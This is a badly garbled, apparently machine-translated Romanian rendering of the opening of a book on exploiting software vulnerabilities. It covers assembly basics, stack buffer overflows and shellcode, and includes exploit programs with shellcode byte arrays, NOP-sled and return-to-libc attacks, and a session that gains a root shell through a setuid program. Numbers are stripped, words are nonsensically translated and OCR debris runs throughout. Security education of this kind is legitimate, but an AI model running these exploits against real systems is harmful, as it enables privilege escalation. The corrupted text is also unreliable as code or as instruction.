„ChJack KoziolChDavid PitchfieldChDave EitelChKris Enley „CHSinan ErenChNeel YehtaCHRili Hassel Artă hacking și protecţie sisteme The Shellcoder-ul Manual: Descoperirea și Exploatarea Gauri de securitate Jack Koziol, Dave aitel, David Litchfield, Chris alley, Sinan "negru" eren, Neel mehta, Riley Hassell WIUY Willcy publicarea, Inc „HJack KoziolXDavid LichfieldXDave EitelHKris Enley „HSinan ErenHNeel Mehtahrili Hassel ussto hacking protecţie sisteme de nstz teyail http ://Netz,sau org http://I> h mpz ru C^PPTER ©WILEY Moscova - St Petersburg - Inferior Novgorod ■ Voronej Rostov-pe-Don - Ekaterinburg • Samara ■ Novosibirsk Kiev * Harkov ■ Minsk Jack Koziol, David Lichfield, Dave Eitel, Chris Enley Sinan Eren, Nil Mehta, Riley Hassel Artă hacking și protecţie sisteme Traducere Cu Engleză E Matveeva administrator editorial Conducere editor Literar editor Pictor Corector Aspect ȘI Krivtsov LA Shraga ȘI Jdanov E Dyachenko Și Smirnova L Kharitonov BBC - UDC Koziol J , Lichfield D , Eitel D , Enley LA și alții I Artă hacking și protecţie sisteme — SPb/ Petru, — Cu : bolnav ISBN - - - LA carte considerată variat tipuri software Securitate: săli de operație sisteme, bazele date, servere de internet și t d Pe multitudine exemple afișate Cum exact găsi vulnerabilități în programatic dispoziţie Temă mai ales relevante, iak Cum în prezentul timp în calculator industrie Securitate software asigura dat Toata lumea Mai mult Atenţie © de J Koziol, D Litchfield, D aitel, C alley, S eren, N mehta, R Hassell © Traducere pe Rusă limba Companie Publicare casa "Petru", © Ediție pe Rusă limba, decor Companie Publicare casa "Petru", Drepturile pe ediție primit pe acord Cu Wiley Toata lumea drepturile rezervat Nici unul parte dat cărți nu poate a fi reprodus în care ar apoi nici a fost formă fără scris permisiuni proprietarii drepturi de autor drepturi Informație, conținea în dat carte, primit din surse, considerată Editura Cum de încredere Tem nu Mai puțin, având în minte posibil uman sau tehnic greșeli, Editura nu poate garanție absolut precizie și completitudine citat informație și nu urșilor responsabilitate pe posibil greșeli legate de Cu folosind cărți ISBN - - - ISBN - - - (Engleză) OOO Piier Presa", Sf I Yeierburg, eu Isieriufskoe autostrada, d , ligi A eu Іaloі nou beneficii - întreg rusească clasificator produse Bine - , volum , — literatură educational Semnat la imprimare Format x / Usl P l , Circulaţie Ordin Nu Imprimat Cu gata diapozite în OGUP "Regional tipografie „Tipărit curte> , G Ulyanovsk, Sf Pușkareva, Scurt conţinut Despre autori şaisprezece Mulțumiri optsprezece Parte eu Exploatare vulnerabilități linux pe procesoare x Capitol Introducere în exploatare vulnerabilități Capitol Revărsare stivă Capitol Introdus cod Capitol patru Defecte format linii Capitol cinci Revărsare grămezi Parte II Platformă Ferestre Capitol Sălbatic pace Windows Capitol Introdus Codul pentru Ferestre Capitol Revărsare în Ferestre Capitol nouă Bypass Filtre Parte III Dezvăluind vulnerabilităţi Capitol Formare lucru miercurea Capitol unsprezece Aplicație erori Capitol Artă fuzzing Capitol Analiză iniţială іeksіov n i m ii ii jv somoisiva DIN eu Capitol paisprezece Insіrumnі іlyіyi аіі ілн i <>l Scurt conţinut Capitol trasarea vulnerabilități Capitol şaisprezece Binar analiza Parte IV Adiţional materiale Capitol Alternativă strategii Capitol optsprezece Real termeni, real probleme Capitol nouăsprezece atacuri pe DBMS Capitol Revărsare în miez Capitol Exploatare vulnerabilități miezuri Alfabetic pointer Conţinut Despre autori şaisprezece Din edituri Mulțumiri optsprezece Parte eu Exploatare vulnerabilități linux pe procesoare x Capitol Introducere în exploatare vulnerabilități Principal concept Control memorie Asamblator Software desene C++ în asamblator Rezultate Capitol Revărsare stivă Tampoane Grămadă Funcții și grămadă Revărsare tampoane în stivă Control sens EIP Utilizare vulnerabilități pentru primind privilegii root (> Problemă adresare Metodă NU Lupta Cu inaplicabil stivă Întoarcere în ІіЬс Rezultate (> Capitol Introdus cod Sistemică funcții Scris implementate cod pentru apel Ieșire() eliminare simboluri-glonț lansa comanda) procesor Conţinut Capitol patru Defecte format linii concept format linii concept defect format linii Utilizare defecte format linii de urgență completare servicii O scurgere Informaţii Control de mai sus performanţă Cauze defecte format linii Revizuire trucuri exploatare defecte format linii Rezultate Capitol cinci Revărsare grămezi concept grămezi Functionare grămezi Revărsare grămezi Principal principii revărsare grămezi Obiecte înlocuiri Rezultate Parte II Platformă Ferestre Capitol Sălbatic pace Windows Diferență Windows și Linux API și PE-COFF pentru Win Morman Multithreading Geniu și prostie concepte DCOM și DCE-RPC Colectie Informaţii Exploatare vulnerabilităţi Markere și împrumut dreapta Tratament excepții în Win Depanatoare pentru Windows Defecte Win Software Scris implementate cod pentru Ferestre Win API pentru hacker Familie Windows Cu puncte viziune hacker Rezultate DIN Capitol Introdus Codul pentru Ferestre Sintaxă și Filtre Pregătire Analiză bloc RUGIT Fişier Hcapoverflow c Căutare Cu folosind mecanism prelucrare excepții Windows lansa comanda Procesor De ce acest do nu ar trebui să (> Rezultate Conţinut nouă Capitol Revărsare în Ferestre Revărsare tampon în stivă Stivuite manipulatorii excepţii manipulare stivuibile procesoare excepții în Windows Server Ultimul lucru cometariu despre suprascrierea grămadă manipulanti Protecţie grămadă și Windows Server Revărsare tampon în grămada morman proces Dinamic grămada Muncă Cu grămada Functionare grămezi Exploatare vulnerabilități la revărsare grămezi Rescriere indicator pe RtlEntcrCriticalSection în RUGIT Rescriere indicator pe primul vector manipulator pe abordare FC Rescriere indicator pe filtru brut excepții Rescriere indicator pe manipulator excepții în bloc TEV Recuperare grămezi Alte aspecte ale revărsare grămezi niste cuvinte în completare Alte Opțiuni revărsări Revărsare secțiuni date Revărsare blocuri TEV și RUGIT Revărsare tampon și neexecutabil sieki Rezultate Capitol nouă Bypass filtre Codul ocolire alfanumerice filtre Codul ocolire Filtre Unicodc Codificare Unicode transformare din ASCII în Unicode Exploatare vulnerabilități codificări Unicode Permis trusa comenzi veneţian metodă Implementarea ASCII veneţian metoda Decriptare nouăsprezece? Codul descifrarea Schimbare adrese tampon nouăsprezece i Rezultate Parte III Dezvăluind vulnerabilităţi Capitol Formare lucru miercuri І (i ( editare meci*|>ііа/іы nouăsprezece(" ( p l eu Іgrpo/ipsnііs pr(iki ( І Performanţă comenzi sala de operatie sisteme M iriosoft SQL Server Oiacul ? IBM eu ) ÎN eu paisprezece Conţinut atacuri pe nivel SQL Funcții SQL Rezultate Capitol Revărsare în miez Tipuri vulnerabilități miezuri Revărsare tampon în grămadă nuclee OpenBSD Rescriere memorie nuclee în OpenBSD O scurgere informație din memorie nuclee în FreeBSD Vulnerabilitate priocntlQ în Solaris Nou vulnerabilități miezuri Revărsare în funcții exec ibcs coff prep zmagic() nuclee OpenBSD Vulnerabilitate enumerare descărcabil module nuclee vfs getvfssw() în Solaris Rezultate Capitol Exploatare vulnerabilități miezuri Vulnerabilitate exec ibcs coff prep zmagic() calcul decalaje și Control puncte Înlocuire adrese întoarcere și interceptare comenzi Chitanță descriptor proces Creare implementate cod regim miezuri Întoarcere din regim miezuri Chitanță privilegii root (uid= ) Vulnerabilitate descărcări module nuclee vfs getvfssw() Dezvoltare cod Descărcabil modul miezuri Chitanță privilegii root (uid= ) Rezultate Alfabetic pointer Dedicat toata lumea și Pentru fiecare, OMS intelege ce hacking și achiziţie nou cunoştinţe — aceasta este imagine viaţă, A nu exercițiu pe casa și nu listă gata instrucțiuni din acest gros cărți Despre autorii Jack Koziol, de bază autor carti, lucru senior profesor și lider programe calculator Securitate în institut infosec A lui in mod regulat a invita pentru Instruire personal în inteligenta, armat forte și corpuri lege si ordine STATELE UNITE ALE AMERICII Cu exceptia A merge, Jack tine educaţie în mulți cea mai mare companii, inclusiv Microsoft, HP și Citibank, în zone protecţie retelelor și aplicatii LA liber timp din deținere Instruire seminarii Jack este logodit încercări pe pătrundere în sisteme și analiză Securitate aplicatii pentru numeroase clientii El are perenă experienţă identificarea și exploatare vulnerabilități Cum pe Comenzi clienti, Asa de și pe proprii inițiativă Rvoziol la fel este autor "Intruziune detectare cu Sforăi, unu din cel mai popular cărți în zone Securitate ( ) Carte a fost tradus pe niste limbi, inclusiv limba franceza și Japonez, și primit înalt estimări în reviste linux jurnal, Slashdot și Informație Securitate Jack vorbit în STATELE UNITE ALE AMERICII astăzi, CNN, msnbc, Primul Afaceri și alții mijloace masa informație pe probleme informativ Securitate El vieți în parcul stejarilor, stat Illinois, din apropiere din acasă și garsoniere Sincer Lloyd Wright, co a lui iubita Tracy și câine cvasi David Lichfield, unu din conducere lume specialişti în zone calculator Securitate, este unu din cinci fondatori NGSoftware David descoperit și publicat Mai mult o sută serios defecte Securitate în diferit produse, inclusiv apache, Microsoft Inteinet informație Server, Oracol eu Microsoft SQL Server Mulțumită imens experienţă în zone alte eu hacking retelelor și aplicatii David în mod constant toate seminarii pe conferințe Biack Pălărie Briefing-uri La fel este principal autor cărți SQL Securitate" t editor stvo Osborne/Mc G brut- H ii) Dave Aitel — autor pachet SPIKE și fondator companiilor „Imitate, Inc , angajate în Securitate în ITg-rsh adică A lui Loc de munca evyazshia iasi yal uatadiei vulnerabilități pe platforme ѴѴnіboѵl și Unix și evoluții metodologii căutare nou vulnerabilități Chris Anly Oportunitati Nexi Generai ion Securitate Software - situat G Marea Britanie companie Anunţ ѵlnіatsіgmi, analiză și dezvoltat despre • mult asigura în zone Securitate Chris akinvpo kіnpm igk eu pe proces vulnerabilitati, el yav^sya autor rând offspa/іyіykh documentep tineri și labei LA dat caz noi din nou singur afară celulă memorie pentru număr echipă D W Sens, stocate în număr, Se încarcă în EAH, după ce noi Să mergem mai departe la labei, dacă sens număr Mai mult sau egală zero, echipă JGE (A sari dacă Mai mare sau Egal — tranziție, dacă Mai mult sau egal) LA Următorul exemplu folosit matrice: int matrice[ ] Codul matrice[ = , Noi anunta matrice aggau și atribui a lui element sens nouă Pe asamblator aceasta este arata Asa de: matrice dw Codul mov ebx, mov matrice[ebx], După reclame matrice Inregistreaza-te EVH folosit pentru sarcinile valorile a lui element In cele din urma considera Mai mult complicat exemplu Următorul fragment cod spectacole Cum funcţie DIN convertit pe asamblator Dacă tu uşor da-i seama în acest cod, probabil, tu gata la citind Următorul capitole int triunghi (int lăţime int înălţime){ int matrice[ ] = { }: int zonă: zonă - lăţime * inaltime/ întoarcere (zonă): L Aici Cum arata acea la fel funcţie în dezasamblat formă (reprezentând s weekend date gdb): x Apăsaţi ^ebp x mov %esp, %ebp x apăsați ^edi x împinge ^esi x I IZZ d r langh'f) sub x USD 'Zup SCH I I • G iaik p) ' 'tj'di Capitol Introducere în exploatare vulnerabilități x b • x : x • x ' x x b - x d x : x x x x c * x e x - x x x x a x b x c mov x USD Jesl cld mov $ x %esp repz movsl %ds:( %esi), %es:( %edi) mov x (%ebp) ^eax mov ^eax ^edx mul OxcKebp) ,^edx mov ^edxjeax sar $ xlUeax shr $ xYueah lea (%eax, ^edx, ), %eax sar ^eax mov £eax, xffffffd (%ebp) mov xffffffd (%ebp)Deah mov Da, da adăuga $ x ^în special pop %esi pop ^edi pop ^ebp ret Rezultate LA acest capitol tu întâlnit Cu principal concepte, necesar pentru înţelegere restul material cărți Prin toate mijloacele a scoate in evidenta timp pe cunoștință Cu lor Dacă inainte de tu nu întâlnite Cu asamblator x și C++, probabil, pentru tine Trebuie să Puțin pregateste-te la în complet măsura a intelege ulterior capitole CAPITOL Revărsare grămadă Revărsare grămadă tradiţional este unu din cel mai popular și Bun celebru metode exploatare vulnerabilități Metode revărsare grămadă în toate felurile popular arhitecturi devotat zeci, dacă nu sute articole Foarte de multe ori întâlni link-uri pe articol, care, probabil, a devenit primul deschis discuţie revărsare grămadă — "Zdrobitor cel Grămadă pentru Distracţie și Profit" ("Spargere grămadă pentru divertisment și a sosit") autor alepha Van (Aleph Ope ) LA acest articol, scris în G , primul clar și clar explicat vulnerabilități bazat pe revărsare tampoane și oportunități lor utilizare Noi recomanda familiariza Cu original articole, publicat în revistă Phrack și accesibil pe abordare www wiley com/compbooks/koziol Metodă revărsare grămadă inventat nu Aleph Van; acest informație a apărut varsta pe zece, A apoi și Mai mult, față publicare "Zdrobitor cel Grămadă" Teoretic revărsare grămadă a apărut simultan Cu limba DIN, A regulat exploatare vulnerabilități Are loc deja Mai mult varsta Cu toate că metode revărsare grămadă constitui cel mai accesibil și Bun documentat Clasă vulnerabilitati, ei încă dominat în contemporan programe a lua legatura la a lui iubit listă lista de e-mail-uri pe probleme Securitate; mai repede Total, tu găsi în limba germana menționează despre descoperire un alt vulnerabilități bazat pe revărsare grămadă Tampoane Tampon numit continuu bloc memorie limitat mărimea cel mai răspândită varietate tampoane în limba DIN constitui matrice nume pe ei voi Fii considerat în din timp acest capitole eu Împlinire grămadă devine posibil mulțumită la asta ce în limbi (' și C+ eu- absent incorporat mecanism verificări frontiere matrice Alții cu / yuvami, limba DIN și a lui urmasi nu avea incorporat functii, care ar despre crezut ce volum date, copiat în tampon, nu depaseste volum cel mai hui fera eu ІСІІ/ІОІІІІМ D/||І : Apăsaţi %ebp x : mutare $esp debp x b - sub $ x ,%esp x e - sub $ x esp x Apăsaţi $ x x Apăsaţi $ x x : caii x x a : adăuga $ x ^în special x d : părăsi x e ret Sfârşit de asamblator haldă Noi v-om vedea ce în puncte și valorile parametrii ( x și x ) sunt introduse în grămadă în verso bine LA punct este comanda sai, care aduce în grămadă adresa întoarcere (RET), cu toate că în listare aceasta este nu afișate Comanda caii transmite Control funcţie pe abordare x Acum dezasambla funcţie și sa vedem, ce merge mai departe la transfer controale: (gdb) dlsas principal Dump de asamblator cod pentru funcţie funcţie x x x x x -End de asamblator haldă Apăsaţi %ebp mutare %esp &ebp sub $ x ,^în special părăsi ret Deoarece al nostru funcţie limitat creare local variabil aggau, dezasamblat Codul se dovedește relativ simplu LA entitate, el conţine numai prolog funcții și comanda întoarcere management principal Primul prolog salvează în grămadă actual indicator cadru EURO Apoi în punct* yekuschin indicator siska copierea în EURO ІІkoisti, nrchoi vyds Revărsare tampoane în grămadă depune în grămadă loc pentru local variabil matrice ( ) Marimea matrice aggau este Total cinci octet, dar memorie pentru grămadă iese în evidență Cu patru- octet creșteri, asa de în final cont pentru local variabile în grămadă rezervat octet Revărsare tampoane în grămadă LA acest secțiune noi descoperi ce merge mai departe la intrând în tampon prea mult mare volum date Numai după acest poate sa va fi trece peste la Mai mult interesant subiecte A exact la exploatare revărsare tampon și interceptare management Să creăm simplu funcţie, care Citeste în tampon date, introdus utilizator, A apoi afișează lor în curgere stdout: gol return input (gol){ char matrice[ ], obţine (matrice): printfOsXn" matrice) } malno { return input() întoarcere } Funcţie nu verificări intrare și permite aduceți în matrice asa de mult elemente, cat de mult vrea utilizator Compila program (nu a uita cheie, determinarea creştere grămadă) Alerga program și introduce date, care trebuie sa a fi enumerate în tampon Pentru start pur şi simplu introduce zece personaje ȘI: [rooWlocalhost /]# /revărsare AAAAAAAAAA AAAAAAAAAA Al nostru simplu funcţie se intoarce introdus linia; Toata lumea lucru, Cum ar trebui să Acum sa incercam introduce şir din personaje ȘI aceasta va conduce la ik*p('-completare tampon și înregistrări date în alte zone grămadă [rădăcină@localhost] /]# /revărsare AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Segmentarea vina (nucleu aruncat) [rădăcină@localhost] /]# La fel de și se presupunea s-a întâmplat eroare segmentare, dar De ce? „І Yu despre plecat co grămadă? Pe orez afișate Cum vyidyady gsek după ііереін>iіkchinya matrice Noi umplut baii iovyii matrice simboluri ȘI și continua/sh zapik eu" ('іыч і la a fost Serios stocate sens eu VR, și pa a ei eu Apăsaţi £ebp x b mov ^esp ^ebp x bb - caii x x c - mov $ x Xeax x c pop %ebp x c ret Sfârşit de asamblator haldă Evident, ce ne Necesar adresa x bb NOTĂ - LA ta mediu inconjurator adrese Mai a fi alții — neapărat defini corect adresa apel returnjnput Deoarece adresa x bb nu Are normal reprezentare în ASCII- simboluri, Trebuie să scrie mic program pentru transformări acest adrese în simbolic intrare După acest noi Hai sa luam weekend date programe și hai sa aducem lor în tampon revărsare La scrie astfel de program, necesar defini marimea tampon și crește a lui pe (adiţional octet pentru înregistrări în EURO și adresa întoarcere) Verifica prolog returnjnput la Ajutor gdb; tu descoperi cat de mult locuri rezervat în grămadă pentru matrice LA al nostru exemplu comanda arata Asa de: x sub $ x %esp hexazecimal record x corespunde zecimal număr , un plus Mai mult primim Acum poate sa scrie program transformări adrese în personaje: principal(){ int = char umplutură[ ] lor ( = , ) strcpy(little array argv[l]), Acest simplu program primeste intrare date din comanda linii și aduce lor în matrice fără verificări frontiere Pentru primind privilegii root necesar numi rădăcină proprietar programe și instalare pic costum Dacă după acest a intra în sistem în calitate comun utilizator (nu rădăcină) și alerga program, tu obține privilegii root [jack@ day local]$ sudo chown rădăcină victlm [jack@ day local]$ sudo chmod +s victimă Acum scrie program, care ar permis ridica părtinire din start programe inainte de primul instrucțiuni implementate cod (idee exemplu împrumutat la Lamagra): #include #defini offset size #defini tampon mărimea Utilizare vulnerabilități pentru primind privilegii root char sc[] = ”\xeb\xla\x e\x \xc \x \x \x \x d\xle\x \x e\x \x \x " „\x c\xb \x b\x \xf \x d\x e\x \x d\x \x c\xcd\x \xe \xel” „\xff\xff\xff\x f\x \x \x e\x f\x \x ”: nesemnat lung find start(void) { asm ("movl ^espjeax"): } int mendnt argc, char *argv[]) char *piele de bivol, *ptr; lung *addr ptr adresa, int offset=dimensiune offset, bsize=buffer size, int eu; dacă (argc > ) bsize = atoi(argv[l]), dacă (argc > ) decalaj = atoi(argv[ ]), adresă = find start() - decalaj, printfCAttempting abordare x%x\n", adresa), ptr = piele de bivol, addr ptr = (lung *) ptr, pentru (i = : i ( jinenl al ion fau unsprezece Capitol Revărsare grămadă Pe acest o singura data noi Intrați prea mult departe și generate prea mult mare părtinire [jack@oday] local]$ /atac Folosind abordare: xbffffl [jack@oday] local]$ /victimă $BUF Segmentarea vina [jack@oday] local]$ /atac Folosind abordare* xbfffe [jack@oday] local]$ /victimă $BUF Segmentarea vina [jack@oday] local]$ /atac Folosind abordare xbfffe [jack@oday] local]$ /victimă $BUF Ilegal instrucțiuni Par a fi, proces selecţie corect părtinire poate continua pentru totdeauna Poate, pe acest o singura data norocos? [jack@oday] local]$ /atac Folosind abordare xbfffe [jack@oday] local]$ /victimă $BUF Ilegal instrucțiuni [jack@oday] local]$ /atac Folosind abordare* xbfffe ea [jack@oday] local]$ /victimă $BUF Ilegal instrucțiuni [jack@oday] local]$ /atac Folosind abordare xbfffea [jack@ day local]$ /victimă $BUF sh- # id uid= (rădăcină) gid= (rădăcină) grupuri= (rădăcină) (roată) sh- b# Excelent — noi ridicat părtinire și lansat privilegiat comanda CPU LA realitate de obicei necesar mult Mai mult încercări (sincer zicală noi Puțin înșelat pentru economii locuri) ATENŢIE - Program efectuate pe calculator Cu sistem roșu Pălărie , Specific rezultate depinde din distributie, versiuni și seturi alții factori depus recepţie suficient plictisitor Pentru tine cont pentru repetat ghici părtinire, A gresit ipoteze uneori conduce la de urgență completare programe Pentru astfel de mic programe aceasta este destul de acceptabil, dar repornire Mai mult serios aplicatii uneori cere timp și eforturi LA Următorul secțiune considerată Mai mult efectiv cale utilizare decalaje Metodă NOP Ridica corect părtinire manual nu este usor ȘI dacă corect decalaje poate a fi niste? Este interzis dacă construi implementate Codul cârlig, Utilizare vulnerabilități pentru primind privilegii root la interceptare management ar putea efectuate pe diferit compensari? Fara indoiala aceasta este accelera proces și a ridica a lui eficienţă Pentru crește numere potenţial decalaje poate sa profită recepţie, care numit metodă NOP Cod N O R (Nu Operațiune) sunt desemnate echipe, furnizarea mic întârziere LA Mai ales ei servi pentru sincronizare în asamblator sau Cum în al nostru exemplu — pentru creare relativ mare blocuri comenzi, care nimic nu do LA al nostru exemplu start implementate cod va fi umplut echipe NOP Dacă presupus părtinire "va rog" în orice punct secțiuni nup, după împlinire toate "gol" comenzi NOP CPU în final cont va primi inainte de real cod 'Asa de modul în care ne Trebuie să ridica nu corect părtinire, A părtinire, referitoare la la oricine abordare în mare bloc NOP Proces numit plus nup, sau creare Substituent NOP Aceste termeni Mai mult repetat se va întâlni pentru tine în viitorul Hai să rescrie program atacuri Asa de, la ea primul generate substituent NOP, A apoi atașat la -l implementate Codul LA procesoare IA comanda NOP notat cod x (exista greutate alții comenzi și lor combinatii, care Mai folosit pentru creare efect nup, dar în acest capitol ei nu considerat) #include #defini DEFAULT-OFFSET #defini DEFAULT BUFFER SIZE #defini NOP x char shelIcodeCJ = „\xeb\xla\x e\x \xc \x \x \x \x d\xle\x \x e\x \x \x ” „\x c\xb \x b\x \xf \x d\x e\x \x d\x \x c\xcd\x \xe \xer „\xff\xff\xff\x f\x \x \x e\x f\x \x ,,> nesemnat lung get sp(void) { asm ("movl ^esp ^eax"), } gol mendnt argc char *argv[]) char *piele de bivol, *ptr, lung *addr ptr adresa, int offset=DEFAULT OFFSET bsize=DEFAULT BUFFER SIZE: int dacă (argc > ) bsize = atoi(argv[l]) Și (argc > ) decalaj = atol(argv[ J), unsprezece ( (buff = malloc(bsize))) { prwtfCCnu pot aloca memorie \n"), exlt(O) Capitol Revărsare grămadă adresă = get sp() - decalaj; prlntf("Se utilizează abordare* x%x\n", adresa); ptr = piele de bivol; addr ptr = (lung *) ptr; pentru ( = ; } x f c (gdb) Funcţie sistem() este pe abordare x f c Acum învăța adresa Ieșire() [rădăcină@ zi local]# gdb fişier (gdb) pauză principal Punct de întrerupere la x e (gdb) alerga Lupta Cu neexecutabil grămadă Startlng program /usr/IOcal/book/f e Breakpolnt , x e În principal () (gdb) p exlt $ = { } x bb (gdb) Funcţie Ieșire() este pe abordare x bb In cele din urma, pentru primind adrese /bin/sh poate sa profită utilitate memfetch (http://lcamtuf coredump cx/), afisarea conţinut memorie pentru dat proces; petrece Căutare în binar fişier și defini adresa /bin/sh în binar fişier Exista și un alt cale: salva şir /bin/sh în variabil mediu inconjurator și obține adresa acest variabil eu In absenta sfarsit, poate sa trece peste la scris programe Noi trebuie sa: Completati tampon fictiv date pâna la inainte de adrese întoarcere A inlocui adresa întoarcere abordare sistem() a arde pe abordare sistem() adresa Ieșire() patru A te alatura adresa /bin/sh Vom vedea, Cum aceasta este trebuie sa să arate ca în cod: # include #def ne offset s ze #def ne buffer s ze char sc[] = „\xc \xf \x \x ” //sistem() „\x \x b\xb \x ” //exlt() „\xa \x a\xb \x ” //binsh unslgned lung find start(vo d) { asm ("movl ^esp ^eax") } int mendnt argc char *argv[]) { char *piele de bivol, *ptr, lung *addr ptr adresă int offset=dimensiune offset, bs ze=dimensiunea tampon int Dacă (argc > ) bsize = atoi (argv[l]), dacă (argc > ) decalaj = atoi(argv[ ]) adresă = f nd start() - decalaj ptr = piele de bivol, addr ptr = (lung *) ptr pentru ( = : : mov mov int x (%esp, ),%ebx $ xfc Deah x USD x d c mov $ x Deah x d cc : int x USD x d ce hlt x d cf : atunci Sfârşit de asamblator haldă LA dezasamblat cod funcții Ieșire sunt numite Două sistemică funcţie- țiuni Codul funcții Se încarcă în Inregistreaza-te EAH în linii ieșire+ și ieșire+ : x d c mov $ xfc Deah x d c mov $ x Deah aceasta coduri și sistemică funcții exit group() și Ieșire() Alte comanda încărcături argument funcții Ieșire în Inregistreaza-te EVH Argument a fost anterior încărcat în grămadă și egală zero: x d bc - mov Oh Shezr, ) Lehx In cele din urma, Două comenzi int x intrerupator CPU în modul nuclee pentru împlinire sistemică functii: x d c int x USD x d cc int x USD Scris implementate cod pentru apel Ieșire() LA entitate, la ne mânca Toata lumea necesar pentru scris implementate cod pentru apel funcții Ieșire() Noi a scris Codul apel sistemică funcții pe DIN, oi compilate și dezasamblat binar fişier, și a dat seama ce face fiecare comanda Stânga do ultimul Etapa: Puțin "a curăța" in afara ponosit Codul, lua hexazecimal coduri comenzi din asamblator și convinge Xia în gom, ce implementat! Codul lucru Asa de, pentru start hai sa ne ocupam optimizare eu In absenta dat etape implementate Codul include din Șapte comenzi El mereu ar trebui să nume" Cum poate sa Mai puțin volum, la potrivi în mic zone Nu Da, iak ch'io sa incercam Puțin a tăia a lui Deoarece implementate kochbuaei Capitol Introdus Codul să fie efectuate "eu insumi pe tu", apoi mânca alte părți programe nu voi a pregati pentru -l argumente (în al nostru exemplu aceasta este sens, descărcabil în EVH din grămadă), argument Trebuie să cere manual Pentru acest suficient aduceți sens O în EVH Cu exceptia A merge, în context al nostru implementate cod suficient sistemică funcții Ieșire(), asa de apel exit group() poate sa inferior; din acest nimic nu se va schimba Pe top nivel al nostru implementate Codul ar trebui să: salva sens în EVH salva sens în EAH Alerga comanda int x pentru apel sistemică funcții NOTĂ - - Introdus Codul ar trebui să a fi maxim simplu și compact Cum mai compact implementate Codul, subiecte Mai mult vulnerabilități poate sa exploata Cu a lui Ajutor Nu a uita ce implementate Codul va fi loc în zone intrare Dacă vulnerabil tampon intrare Are lungime P octet, apoi în aceste P octet trebuie sa loc și implementate Codul, și comenzi pentru a lui apel, asa de volum cod ar trebui să a fi mai mica P La creare implementate cod mereu trebuie sa tine minte despre acest prescripţie Să scriem aceste Trei Etapa pe asamblator Din primit binar Fișierul ELF poate sa va fi extrage mașinărie comenzi: Secțiune text global start start: mov ebx O mov eax l int x Folosim asamblator nasm pentru creare obiectiv fişier, A apoi Compune obiect fișiere linker GNU: [slap@oday] rădăcină] nasm -f elf exit shellcode asm [slap@oday] rădăcină] ID -o exit shelIcode exit shellcode In cele din urma, poate sa trece peste la primind mașinărie coduri Pentru acest obiective noi hai sa folosim utilitate objdump — simplu program, afisarea conţinut obiectiv fișiere în formă, de inteles pentru persoană Program la fel formate coduri mașinărie comenzi, ce face a ei mai ales confortabil pentru creare implementate cod Trece utilitate objdump al nostru program Ieșire shellcode: [slap@oday] rădăcină] objdump -d exit shelIcode exit shelIcode fişier format elf - Dezasamblarea de secțiune text bb mov $ x Debx Scris implementate cod pentru apel Ieșire() : b mov $ x Deah a: CD nt x USD LA lege coloană retras asamblator echipe, A în in medie — mașinărie coduri Rămășițe numai loc mașinărie coduri în simbolic matrice și papi-sa gh mic program pe DIN pentru a lui execuţie Mai departe este dată unu din posibil implementari final produs: char shellcode[] = „\xbb\x \x \x \x ” „\xb \x \x \x \x ” „\xcd\x ” int principal() nt *ret, ret = (Int *)&ret + : (*ret) = (int)shelIcode, } () compila program și Test implementate Codul: [slap@ day palmă] gcc -despre wack wack c [slapOOday] palmă] /wack [slapOOday] palmă] Pa Toata lumea arata Asa de, ca program încheiat comun manieră La fel de asigurați-vă că în volum, ce completare a avut loc mulțumită implementate cod? Să folosim trasor sistemică funcții (strace) pentru primind listă toate sistemică functii, cauzat în program Rezultat muncă strace arata Asa de: [slap@ day palmă] strace /wack execveC /wack", [" /wack"], [/* vărs */]) = uname({sys="Linux", node=" day jackkoziol com", }) = brk(O) = Ox d old mmap(NULL, PROT READ | PROTJRITE, HARTĂ PRIVAT | MAP ANONIM, , )= x deschide ("/etc/ld so preload" O RDONLY) = - ENOENT (Nu astfel de fişier sau director) deschide ("/etc/ld asa de cache", O RDONLY) = fstat ( , {st mode=S IFREG| , st s ze= , }) = old mmap(NULL , PROTJEAD, MAP PRIVATE, , ) = x aproape( ) = open(' ib/tls/ ibe asa de " OJDONLY) = citește ( „\ ELF\l\l\l\ \ \ \ \ \ \ \ \ \ \ \ \ \l\ \ VV\ B \O” , ) = Istat { , {st mode=S IFREG| , st size= , }) = vechi mmap( x , , PROTJEAD | PROTJXEC, HARTĂ PRIVAT, ) = x veche mmap( x e , , PROT READ|PROTJRITE MAPJRIVATE|HARTĂ FIXED, xl e ) = x e vechi mmap( x , PROT READ|PROTJRITE HARTĂ-RIVATE | MAP FIXED|HARTĂ ANONIMĂ, - , )= x ( pierde ( ) = ■ (d thread area({entry number - -> bază adr- x e , limită , seg bit , continuturi , read exec only• , eu iinil in pages l, seg nu prezent , utilizabil }) = inimap( x ) = Capitol Introdus Codul La fel de vedea în cele mai recente linia prezent al nostru apel ieșire (O) Dacă tu vrei întoarce-te la implementate cod și aprinde în -l apel sistemică funcții exit group(): char shellcodeE] = „\xbb\x \x \x \x ” •'\xb \xfc\xOO\xOO\xOO" „\xcd\x ”: int principalO { nt *PPt' ret = (Int *)&ret + , (*ret) = (int)shellcode } Introdus Codul Cu funcţie exit group() va conduce la la asta la fel efect A plati Atenţie: noi înlocuit octet \x ( ) în al doilea linia octet \xfc ( ) și acum implementate Codul va fi apel funcţie exit group() Cu acestea la fel argumente Recopilați program și alerga strace din nou; pe acest o singura data în rezultate trasarea va fi specificat nou funcţie exit group(): [slap@ day palmă] strace /wack execveC /wack" [" /wack"] [/* vărs */]) = uname({sys=,,L nux" node=" day jackkozlol porumb", }) = brk(O) = Ox d old mmap(NULL, PROT READ|PROT WRITE MAP PRIVATE | HARTĂ ANONIMĂ - ) = x deschide ("/etc/ld asa de preîncărcare” O RDONLY) = - ENOENT (Nu astfel de fişier sau director) open(' etc/ld so cache” O RDONLY) = fstat ( {st mode=S IFREG| st size= , }) = old mmap(NULL PROT READ MAP PRIVATE, ) = x aproape( ) = openC/lib/tls/libc asa de " O RDONLY) = citește ( „\ ELF\l\l\l\ \ \ \ \ \ \ \ \ \ \ \ \ \l\ \ VV\ B \O” ) = fstat { {st mode=S IFREG| st size= , }) = old mmap( x PROT READ|PROT EXEC MAP PRIVATE , ) = x veche mmap( x e , PROT READ|PROT WRITE MAP PRIVATE|HARTĂ FIXED xl e ) = x e old mmap( x PROT READ|PROT WR TE MAP PRIVATE | MAP FIXED|HARTĂ ANONIMĂ - ) = x aproape( ) = set thread area({entry number - -> adresa bază x e Urnit seg bit continuturi read exec only- imit n pagini seg nu prezent utilizabil }) = munmap( x ) = exit group( ) = ? Noi numai ce 